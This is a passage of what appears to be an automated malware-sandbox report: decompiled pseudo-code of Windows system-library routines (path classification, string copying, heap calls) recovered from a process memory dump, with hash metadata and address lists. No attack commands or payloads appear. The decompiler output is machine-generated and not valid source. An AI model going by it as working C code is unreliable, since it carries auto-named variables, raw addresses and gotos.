                                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                        														_t455 =  *(_t528 - 0xdc);
                                        														 *(_t427 + 0x14) = _t455;
                                        														_t480 =  *(_t528 - 0xa0);
                                        														_t517 = 3;
                                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                        															asm("rdtsc");
                                        															 *(_t427 + 0x3c) = _t480;
                                        														} else {
                                        															 *(_t427 + 0x3c) = _t455;
                                        														}
                                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                        														_t456 =  *[fs:0x18];
                                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                        														_t427 = 0;
                                        														__eflags = 0;
                                        														_t511 = 0x18;
                                        														goto L91;
                                        													} else {
                                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                        														__eflags = _t519;
                                        														 *(_t528 - 0x8c) = _t328;
                                        														do {
                                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                        																_t334 =  *_t519;
                                        															} else {
                                        																_t334 = 0;
                                        															}
                                        															_t336 = _t334 & 0x000000ff;
                                        															__eflags = _t336;
                                        															_t427 =  *(_t528 - 0x88);
                                        															if(_t336 == 0) {
                                        																_t481 = _t479 + _t506;
                                        																__eflags = _t481;
                                        																 *(_t528 - 0x78) = _t481;
                                        																E053DF3E0(_t479 + _t427, _t457, _t506);
                                        																_t529 = _t529 + 0xc;
                                        															} else {
                                        																_t340 = _t336 - 1;
                                        																__eflags = _t340;
                                        																if(_t340 == 0) {
                                        																	E053DF3E0( *(_t528 - 0xb8), _t457, _t506);
                                        																	_t529 = _t529 + 0xc;
                                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                        																} else {
                                        																	__eflags = _t340 == 0;
                                        																	if(_t340 == 0) {
                                        																		__eflags = _t506 - 8;
                                        																		if(_t506 == 8) {
                                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        															_t339 = 0x10;
                                        															_t519 = _t519 + _t339;
                                        															_t263 = _t528 - 0x8c;
                                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                                        															__eflags =  *_t263;
                                        															_t479 =  *(_t528 - 0x78);
                                        														} while ( *_t263 != 0);
                                        														goto L87;
                                        													}
                                        												}
                                        											} else {
                                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                        												 *(_t528 - 0xa2) = _t392;
                                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                        												__eflags = _t469;
                                        												while(1) {
                                        													 *(_t528 - 0xe4) = _t511;
                                        													__eflags = _t392;
                                        													_t393 = _t427;
                                        													if(_t392 != 0) {
                                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                                        													}
                                        													_t395 = (_t393 & 0x000000ff) - _t427;
                                        													__eflags = _t395;
                                        													if(_t395 == 0) {
                                        														_t511 = _t511 +  *_t469;
                                        														__eflags = _t511;
                                        													} else {
                                        														_t398 = _t395 - 1;
                                        														__eflags = _t398;
                                        														if(_t398 == 0) {
                                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                        														} else {
                                        															__eflags = _t398 == 1;
                                        															if(_t398 == 1) {
                                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                        																_t402 =  *_t469 & 0x0000ffff;
                                        																 *(_t528 - 0xac) = _t402;
                                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                        															}
                                        														}
                                        													}
                                        													__eflags = _t511 -  *(_t528 - 0xe4);
                                        													if(_t511 <  *(_t528 - 0xe4)) {
                                        														break;
                                        													}
                                        													_t397 =  *(_t528 - 0x88) + 1;
                                        													 *(_t528 - 0x88) = _t397;
                                        													_t469 = _t469 + 0x10;
                                        													__eflags = _t397 -  *(_t528 + 0x1c);
                                        													_t392 =  *(_t528 - 0xa2);
                                        													if(_t397 <  *(_t528 + 0x1c)) {
                                        														continue;
                                        													}
                                        													goto L45;
                                        												}
                                        												_t475 = 0x216;
                                        												 *(_t528 - 0x74) = 0x216;
                                        												goto L45;
                                        											}
                                        										} else {
                                        											asm("lock dec dword [eax+ecx*8+0x4]");
                                        											goto L16;
                                        										}
                                        									}
                                        									_t491 = E05464CAB(_t306, _t528 - 0xa4);
                                        									 *(_t528 - 0x74) = _t491;
                                        									__eflags = _t491;
                                        									if(_t491 != 0) {
                                        										goto L91;
                                        									} else {
                                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                        										goto L20;
                                        									}
                                        								}
                                        								L16:
                                        								 *(_t528 - 0x74) = 0x1069;
                                        								L93:
                                        								_t298 =  *(_t528 - 0xd0) + 1;
                                        								 *(_t528 - 0xd0) = _t298;
                                        								_t474 = _t474 + _t511;
                                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                        								_t494 = 4;
                                        								__eflags = _t298 - _t494;
                                        								if(_t298 >= _t494) {
                                        									goto L100;
                                        								}
                                        								_t494 =  *(_t528 - 0xcc);
                                        								_t435 = _t298;
                                        								continue;
                                        							}
                                        							__eflags = _t494[2] | _t494[3];
                                        							if((_t494[2] | _t494[3]) == 0) {
                                        								goto L15;
                                        							}
                                        							goto L12;
                                        						}
                                        						__eflags = _t301;
                                        						if(_t301 != 0) {
                                        							goto L92;
                                        						}
                                        						goto L10;
                                        						L92:
                                        						goto L93;
                                        					}
                                        				} else {
                                        					_push(0x57);
                                        					L101:
                                        					return E053ED130(_t427, _t494, _t511);
                                        				}
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44c2ec4a2066f63d573de798072c54a4ec90995a57e226771eaadc934c5f8eb4
                                        • Instruction ID: f4b6a5a9024eafa1ded950b129faa026e31b7c73390f74616621ce2462d75f32
                                        • Opcode Fuzzy Hash: 44c2ec4a2066f63d573de798072c54a4ec90995a57e226771eaadc934c5f8eb4
                                        • Instruction Fuzzy Hash: 06423775A042298FDB24CF68C880BEAB7B2FF49304F1581EAD949AB342D7749985CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E053B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                        				signed int _v8;
                                        				void* _v20;
                                        				signed int _v24;
                                        				char _v532;
                                        				char _v540;
                                        				signed short _v544;
                                        				signed int _v548;
                                        				signed short* _v552;
                                        				signed short _v556;
                                        				signed short* _v560;
                                        				signed short* _v564;
                                        				signed short* _v568;
                                        				void* _v570;
                                        				signed short* _v572;
                                        				signed short _v576;
                                        				signed int _v580;
                                        				char _v581;
                                        				void* _v584;
                                        				unsigned int _v588;
                                        				signed short* _v592;
                                        				void* _v597;
                                        				void* _v600;
                                        				void* _v604;
                                        				void* _v609;
                                        				void* _v616;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				unsigned int _t161;
                                        				signed int _t162;
                                        				unsigned int _t163;
                                        				void* _t169;
                                        				signed short _t173;
                                        				signed short _t177;
                                        				signed short _t181;
                                        				unsigned int _t182;
                                        				signed int _t185;
                                        				signed int _t213;
                                        				signed int _t225;
                                        				short _t233;
                                        				signed char _t234;
                                        				signed int _t242;
                                        				signed int _t243;
                                        				signed int _t244;
                                        				signed int _t245;
                                        				signed int _t250;
                                        				void* _t251;
                                        				signed short* _t254;
                                        				void* _t255;
                                        				signed int _t256;
                                        				void* _t257;
                                        				signed short* _t260;
                                        				signed short _t265;
                                        				signed short* _t269;
                                        				signed short _t271;
                                        				signed short** _t272;
                                        				signed short* _t275;
                                        				signed short _t282;
                                        				signed short _t283;
                                        				signed short _t290;
                                        				signed short _t299;
                                        				signed short _t307;
                                        				signed int _t308;
                                        				signed short _t311;
                                        				signed short* _t315;
                                        				signed short _t316;
                                        				void* _t317;
                                        				void* _t319;
                                        				signed short* _t321;
                                        				void* _t322;
                                        				void* _t323;
                                        				unsigned int _t324;
                                        				signed int _t325;
                                        				void* _t326;
                                        				signed int _t327;
                                        				signed int _t329;
                                        
                                        				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                        				_v8 =  *0x548d360 ^ _t329;
                                        				_t157 = _a8;
                                        				_t321 = _a4;
                                        				_t315 = __edx;
                                        				_v548 = __ecx;
                                        				_t305 = _a20;
                                        				_v560 = _a12;
                                        				_t260 = _a16;
                                        				_v564 = __edx;
                                        				_v580 = _a8;
                                        				_v572 = _t260;
                                        				_v544 = _a20;
                                        				if( *__edx <= 8) {
                                        					L3:
                                        					if(_t260 != 0) {
                                        						 *_t260 = 0;
                                        					}
                                        					_t254 =  &_v532;
                                        					_v588 = 0x208;
                                        					if((_v548 & 0x00000001) != 0) {
                                        						_v556 =  *_t315;
                                        						_v552 = _t315[2];
                                        						_t161 = E053CF232( &_v556);
                                        						_t316 = _v556;
                                        						_v540 = _t161;
                                        						goto L17;
                                        					} else {
                                        						_t306 = 0x208;
                                        						_t298 = _t315;
                                        						_t316 = E053B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                        						if(_t316 == 0) {
                                        							L68:
                                        							_t322 = 0xc0000033;
                                        							goto L39;
                                        						} else {
                                        							while(_v581 == 0) {
                                        								_t233 = _v588;
                                        								if(_t316 > _t233) {
                                        									_t234 = _v548;
                                        									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                        										_t254 = L053B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                        										if(_t254 == 0) {
                                        											_t169 = 0xc0000017;
                                        										} else {
                                        											_t298 = _v564;
                                        											_v588 = _t316;
                                        											_t306 = _t316;
                                        											_t316 = E053B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                        											if(_t316 != 0) {
                                        												continue;
                                        											} else {
                                        												goto L68;
                                        											}
                                        										}
                                        									} else {
                                        										goto L90;
                                        									}
                                        								} else {
                                        									_v556 = _t316;
                                        									 *((short*)(_t329 + 0x32)) = _t233;
                                        									_v552 = _t254;
                                        									if(_t316 < 2) {
                                        										L11:
                                        										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                        											_t161 = 5;
                                        										} else {
                                        											if(_t316 < 6) {
                                        												L87:
                                        												_t161 = 3;
                                        											} else {
                                        												_t242 = _t254[2] & 0x0000ffff;
                                        												if(_t242 != 0x5c) {
                                        													if(_t242 == 0x2f) {
                                        														goto L16;
                                        													} else {
                                        														goto L87;
                                        													}
                                        													goto L101;
                                        												} else {
                                        													L16:
                                        													_t161 = 2;
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										_t243 =  *_t254 & 0x0000ffff;
                                        										if(_t243 == 0x5c || _t243 == 0x2f) {
                                        											if(_t316 < 4) {
                                        												L81:
                                        												_t161 = 4;
                                        												goto L17;
                                        											} else {
                                        												_t244 = _t254[1] & 0x0000ffff;
                                        												if(_t244 != 0x5c) {
                                        													if(_t244 == 0x2f) {
                                        														goto L60;
                                        													} else {
                                        														goto L81;
                                        													}
                                        												} else {
                                        													L60:
                                        													if(_t316 < 6) {
                                        														L83:
                                        														_t161 = 1;
                                        														goto L17;
                                        													} else {
                                        														_t245 = _t254[2] & 0x0000ffff;
                                        														if(_t245 != 0x2e) {
                                        															if(_t245 == 0x3f) {
                                        																goto L62;
                                        															} else {
                                        																goto L83;
                                        															}
                                        														} else {
                                        															L62:
                                        															if(_t316 < 8) {
                                        																L85:
                                        																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                        																goto L17;
                                        															} else {
                                        																_t250 = _t254[3] & 0x0000ffff;
                                        																if(_t250 != 0x5c) {
                                        																	if(_t250 == 0x2f) {
                                        																		goto L64;
                                        																	} else {
                                        																		goto L85;
                                        																	}
                                        																} else {
                                        																	L64:
                                        																	_t161 = 6;
                                        																	goto L17;
                                        																}
                                        															}
                                        														}
                                        													}
                                        												}
                                        											}
                                        											goto L101;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									}
                                        									L17:
                                        									if(_t161 != 2) {
                                        										_t162 = _t161 - 1;
                                        										if(_t162 > 5) {
                                        											goto L18;
                                        										} else {
                                        											switch( *((intOrPtr*)(_t162 * 4 +  &M053B45F8))) {
                                        												case 0:
                                        													_v568 = 0x5371078;
                                        													__eax = 2;
                                        													goto L20;
                                        												case 1:
                                        													goto L18;
                                        												case 2:
                                        													_t163 = 4;
                                        													goto L19;
                                        											}
                                        										}
                                        										goto L41;
                                        									} else {
                                        										L18:
                                        										_t163 = 0;
                                        										L19:
                                        										_v568 = 0x53711c4;
                                        									}
                                        									L20:
                                        									_v588 = _t163;
                                        									_v564 = _t163 + _t163;
                                        									_t306 =  *_v568 & 0x0000ffff;
                                        									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                        									_v576 = _t265;
                                        									if(_t265 > 0xfffe) {
                                        										L90:
                                        										_t322 = 0xc0000106;
                                        									} else {
                                        										if(_t321 != 0) {
                                        											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                        												if(_v580 != 0) {
                                        													goto L23;
                                        												} else {
                                        													_t322 = 0xc0000106;
                                        													goto L39;
                                        												}
                                        											} else {
                                        												_t177 = _t306;
                                        												goto L25;
                                        											}
                                        											goto L101;
                                        										} else {
                                        											if(_v580 == _t321) {
                                        												_t322 = 0xc000000d;
                                        											} else {
                                        												L23:
                                        												_t173 = L053B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                        												_t269 = _v592;
                                        												_t269[2] = _t173;
                                        												if(_t173 == 0) {
                                        													_t322 = 0xc0000017;
                                        												} else {
                                        													_t316 = _v556;
                                        													 *_t269 = 0;
                                        													_t321 = _t269;
                                        													_t269[1] = _v576;
                                        													_t177 =  *_v568 & 0x0000ffff;
                                        													L25:
                                        													_v580 = _t177;
                                        													if(_t177 == 0) {
                                        														L29:
                                        														_t307 =  *_t321 & 0x0000ffff;
                                        													} else {
                                        														_t290 =  *_t321 & 0x0000ffff;
                                        														_v576 = _t290;
                                        														_t310 = _t177 & 0x0000ffff;
                                        														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                        															_t307 =  *_t321 & 0xffff;
                                        														} else {
                                        															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                        															E053DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                        															_t329 = _t329 + 0xc;
                                        															_t311 = _v580;
                                        															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                        															 *_t321 = _t225;
                                        															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                        																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                        															}
                                        															goto L29;
                                        														}
                                        													}
                                        													_t271 = _v556 - _v588 + _v588;
                                        													_v580 = _t307;
                                        													_v576 = _t271;
                                        													if(_t271 != 0) {
                                        														_t308 = _t271 & 0x0000ffff;
                                        														_v588 = _t308;
                                        														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                        															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                        															E053DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                        															_t329 = _t329 + 0xc;
                                        															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                        															 *_t321 = _t213;
                                        															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                        																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                        															}
                                        														}
                                        													}
                                        													_t272 = _v560;
                                        													if(_t272 != 0) {
                                        														 *_t272 = _t321;
                                        													}
                                        													_t306 = 0;
                                        													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                        													_t275 = _v572;
                                        													if(_t275 != 0) {
                                        														_t306 =  *_t275;
                                        														if(_t306 != 0) {
                                        															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                        														}
                                        													}
                                        													_t181 = _v544;
                                        													if(_t181 != 0) {
                                        														 *_t181 = 0;
                                        														 *((intOrPtr*)(_t181 + 4)) = 0;
                                        														 *((intOrPtr*)(_t181 + 8)) = 0;
                                        														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                        														if(_v540 == 5) {
                                        															_t182 = E053952A5(1);
                                        															_v588 = _t182;
                                        															if(_t182 == 0) {
                                        																E053AEB70(1, 0x54879a0);
                                        																goto L38;
                                        															} else {
                                        																_v560 = _t182 + 0xc;
                                        																_t185 = E053AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                        																if(_t185 == 0) {
                                        																	_t324 = _v588;
                                        																	goto L97;
                                        																} else {
                                        																	_t306 = _v544;
                                        																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                        																	 *(_t306 + 4) = _t282;
                                        																	_v576 = _t282;
                                        																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                        																	 *_t306 = _t325;
                                        																	if( *_t282 == 0x5c) {
                                        																		_t149 = _t325 - 2; // -2
                                        																		_t283 = _t149;
                                        																		 *_t306 = _t283;
                                        																		 *(_t306 + 4) = _v576 + 2;
                                        																		_t185 = _t283 & 0x0000ffff;
                                        																	}
                                        																	_t324 = _v588;
                                        																	 *(_t306 + 2) = _t185;
                                        																	if((_v548 & 0x00000002) == 0) {
                                        																		L97:
                                        																		asm("lock xadd [esi], eax");
                                        																		if((_t185 | 0xffffffff) == 0) {
                                        																			_push( *((intOrPtr*)(_t324 + 4)));
                                        																			E053D95D0();
                                        																			L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                        																		}
                                        																	} else {
                                        																		 *(_t306 + 0xc) = _t324;
                                        																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                        																	}
                                        																	goto L38;
                                        																}
                                        															}
                                        															goto L41;
                                        														}
                                        													}
                                        													L38:
                                        													_t322 = 0;
                                        												}
                                        											}
                                        										}
                                        									}
                                        									L39:
                                        									if(_t254 !=  &_v532) {
                                        										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                        									}
                                        									_t169 = _t322;
                                        								}
                                        								goto L41;
                                        							}
                                        							goto L68;
                                        						}
                                        					}
                                        					L41:
                                        					_pop(_t317);
                                        					_pop(_t323);
                                        					_pop(_t255);
                                        					return E053DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                        				} else {
                                        					_t299 = __edx[2];
                                        					if( *_t299 == 0x5c) {
                                        						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                        						if(_t256 != 0x5c) {
                                        							if(_t256 != 0x3f) {
                                        								goto L2;
                                        							} else {
                                        								goto L50;
                                        							}
                                        						} else {
                                        							L50:
                                        							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                        								goto L2;
                                        							} else {
                                        								_t251 = E053D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                        								_pop(_t319);
                                        								_pop(_t326);
                                        								_pop(_t257);
                                        								return E053DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                        							}
                                        						}
                                        					} else {
                                        						L2:
                                        						_t260 = _v572;
                                        						goto L3;
                                        					}
                                        				}
                                        				L101:
                                        			}
                                        0x053fe1ab
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x053b4588
                                        0x053b4588
                                        0x053b458c
                                        0x053fe1c4
                                        0x053fe1c4
                                        0x00000000
                                        0x053b4592
                                        0x053b4592
                                        0x053b4599
                                        0x053fe1be
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x053b459f
                                        0x053b459f
                                        0x053b45a3
                                        0x053fe1d7
                                        0x053fe1e4
                                        0x00000000
                                        0x053b45a9
                                        0x053b45a9
                                        0x053b45b0
                                        0x053fe1d1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x053b45b6
                                        0x053b45b6
                                        0x053b45b6
                                        0x00000000
                                        0x053b45b6
                                        0x053b45b0
                                        0x053b45a3
                                        0x053b4599
                                        0x053b458c
                                        0x053b4582
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x053b41f4
                                        0x053b423e
                                        0x053b4241
                                        0x053b45c0
                                        0x053b45c4
                                        0x00000000
                                        0x053b45ca
                                        0x053b45ca
                                        0x00000000
                                        0x053fe207
                                        0x053fe20f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x053b45d1
                                        0x00000000
                                        0x00000000
                                        0x053b45ca
                                        0x00000000
                                        0x053b4247
                                        0x053b4247
                                        0x053b4247
                                        0x053b4249
                                        0x053b4249
                                        0x053b4249
                                        0x053b4251
                                        0x053b4251
                                        0x053b4257
                                        0x053b425f
                                        0x053b426e
                                        0x053b4270
                                        0x053b427a
                                        0x053fe219
                                        0x053fe219
                                        0x053b4280
                                        0x053b4282
                                        0x053b4456
                                        0x053b45ea
                                        0x00000000
                                        0x053b45f0
                                        0x053fe223
                                        0x00000000
                                        0x053fe223
                                        0x053b445c
                                        0x053b445c
                                        0x00000000
                                        0x053b445c
                                        0x00000000
                                        0x053b4288
                                        0x053b428c
                                        0x053fe298
                                        0x053b4292
                                        0x053b4292
                                        0x053b429e
                                        0x053b42a3
                                        0x053b42a7
                                        0x053b42ac
                                        0x053fe22d
                                        0x053b42b2
                                        0x053b42b2
                                        0x053b42b9
                                        0x053b42bc
                                        0x053b42c2
                                        0x053b42ca
                                        0x053b42cd
                                        0x053b42cd
                                        0x053b42d4
                                        0x053b433f
                                        0x053b433f
                                        0x053b42d6
                                        0x053b42d6
                                        0x053b42d9
                                        0x053b42dd
                                        0x053b42eb
                                        0x053fe23a
                                        0x053b42f1
                                        0x053b4305
                                        0x053b430d
                                        0x053b4315
                                        0x053b4318
                                        0x053b431f
                                        0x053b4322
                                        0x053b432e
                                        0x053b433b
                                        0x053b433b
                                        0x00000000
                                        0x053b432e
                                        0x053b42eb
                                        0x053b434c
                                        0x053b434e
                                        0x053b4352
                                        0x053b4359
                                        0x053b435e
                                        0x053b4361
                                        0x053b436e
                                        0x053b438a
                                        0x053b438e
                                        0x053b4396
                                        0x053b439e
                                        0x053b43a1
                                        0x053b43ad
                                        0x053b43bb
                                        0x053b43bb
                                        0x053b43ad
                                        0x053b436e
                                        0x053b43bf
                                        0x053b43c5
                                        0x053b4463
                                        0x053b4463
                                        0x053b43ce
                                        0x053b43d5
                                        0x053b43d9
                                        0x053b43df
                                        0x053b4475
                                        0x053b4479
                                        0x053b4491
                                        0x053b4491
                                        0x053b4479
                                        0x053b43e5
                                        0x053b43eb
                                        0x053b43f4
                                        0x053b43f6
                                        0x053b43f9
                                        0x053b43fc
                                        0x053b43ff
                                        0x053b44e8
                                        0x053b44ed
                                        0x053b44f3
                                        0x053fe247
                                        0x00000000
                                        0x053b44f9
                                        0x053b4504
                                        0x053b4508
                                        0x053b450f
                                        0x053fe269
                                        0x00000000
                                        0x053b4515
                                        0x053b4519
                                        0x053b4531
                                        0x053b4534
                                        0x053b4537
                                        0x053b453e
                                        0x053b4541
                                        0x053b454a
                                        0x053fe255
                                        0x053fe255
                                        0x053fe25b
                                        0x053fe25e
                                        0x053fe261
                                        0x053fe261
                                        0x053b4555
                                        0x053b4559
                                        0x053b455d
                                        0x053fe26d
                                        0x053fe270
                                        0x053fe274
                                        0x053fe27a
                                        0x053fe27d
                                        0x053fe28e
                                        0x053fe28e
                                        0x053b4563
                                        0x053b4563
                                        0x053b4569
                                        0x053b4569
                                        0x00000000
                                        0x053b455d
                                        0x053b450f
                                        0x00000000
                                        0x053b44f3
                                        0x053b43ff
                                        0x053b4405
                                        0x053b4405
                                        0x053b4405
                                        0x053b42ac
                                        0x053b428c
                                        0x053b4282
                                        0x053b4407
                                        0x053b440d
                                        0x053fe2af
                                        0x053fe2af
                                        0x053b4413
                                        0x053b4413
                                        0x00000000
                                        0x053b41d4
                                        0x00000000
                                        0x053b41c3
                                        0x053b41bd
                                        0x053b4415
                                        0x053b4415
                                        0x053b4416
                                        0x053b4417
                                        0x053b4429
                                        0x053b416e
                                        0x053b416e
                                        0x053b4175
                                        0x053b4498
                                        0x053b449f
                                        0x053fe12d
                                        0x00000000
                                        0x053fe133
                                        0x00000000
                                        0x053fe133
                                        0x053b44a5
                                        0x053b44a5
                                        0x053b44aa
                                        0x00000000
                                        0x053b44bb
                                        0x053b44ca
                                        0x053b44d6
                                        0x053b44d7
                                        0x053b44d8
                                        0x053b44e3
                                        0x053b44e3
                                        0x053b44aa
                                        0x053b417b
                                        0x053b417b
                                        0x053b417b
                                        0x00000000
                                        0x053b417b
                                        0x053b4175
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 78181b8624a9f702ddda0cde6eee25c6f478890d2a2c10a34b50bd2dc490a418
                                        • Instruction ID: 90846f508b812282bf74d6a3783b93aa2f78a9acfc75f21467e863b58054fcce
                                        • Opcode Fuzzy Hash: 78181b8624a9f702ddda0cde6eee25c6f478890d2a2c10a34b50bd2dc490a418
                                        • Instruction Fuzzy Hash: D6F1B0706082118FDB14CF19C480A7AB7E7FF88704F04492EF686CBA61E7B4D991DB56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E053AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                        				signed int _v8;
                                        				intOrPtr _v20;
                                        				signed int _v36;
                                        				intOrPtr* _v40;
                                        				signed int _v44;
                                        				signed int _v48;
                                        				signed char _v52;
                                        				signed int _v60;
                                        				signed int _v64;
                                        				signed int _v68;
                                        				signed int _v72;
                                        				signed int _v76;
                                        				intOrPtr _v80;
                                        				signed int _v84;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				signed int _v108;
                                        				signed int _v112;
                                        				signed int _v116;
                                        				intOrPtr _v120;
                                        				signed int _v132;
                                        				char _v140;
                                        				char _v144;
                                        				char _v157;
                                        				signed int _v164;
                                        				signed int _v168;
                                        				signed int _v169;
                                        				intOrPtr _v176;
                                        				signed int _v180;
                                        				signed int _v184;
                                        				intOrPtr _v188;
                                        				signed int _v192;
                                        				signed int _v200;
                                        				signed int _v208;
                                        				intOrPtr* _v212;
                                        				char _v216;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed int _t204;
                                        				signed int _t206;
                                        				void* _t208;
                                        				signed int _t211;
                                        				signed int _t216;
                                        				intOrPtr _t217;
                                        				intOrPtr* _t218;
                                        				signed int _t226;
                                        				signed int _t239;
                                        				signed int* _t247;
                                        				signed int _t249;
                                        				void* _t252;
                                        				signed int _t256;
                                        				signed int _t269;
                                        				signed int _t271;
                                        				signed int _t277;
                                        				signed int _t279;
                                        				intOrPtr _t283;
                                        				signed int _t287;
                                        				signed int _t288;
                                        				void* _t289;
                                        				signed char _t290;
                                        				signed int _t292;
                                        				signed int* _t293;
                                        				unsigned int _t297;
                                        				signed int _t306;
                                        				signed int _t307;
                                        				signed int _t308;
                                        				signed int _t309;
                                        				signed int _t310;
                                        				intOrPtr _t311;
                                        				intOrPtr _t312;
                                        				signed int _t319;
                                        				signed int _t320;
                                        				signed int* _t324;
                                        				signed int _t337;
                                        				signed int _t338;
                                        				signed int _t339;
                                        				signed int* _t340;
                                        				void* _t341;
                                        				signed int _t344;
                                        				signed int _t348;
                                        				signed int _t349;
                                        				signed int _t351;
                                        				intOrPtr _t353;
                                        				void* _t354;
                                        				signed int _t356;
                                        				signed int _t358;
                                        				intOrPtr _t359;
                                        				signed int _t361;
                                        				signed int _t363;
                                        				signed short* _t365;
                                        				void* _t367;
                                        				intOrPtr _t369;
                                        				void* _t370;
                                        				signed int _t371;
                                        				signed int _t372;
                                        				void* _t374;
                                        				signed int _t376;
                                        				void* _t384;
                                        				signed int _t387;
                                        
                                        				_v8 =  *0x548d360 ^ _t376;
                                        				_t2 =  &_a20;
                                        				 *_t2 = _a20 & 0x00000001;
                                        				_t287 = _a4;
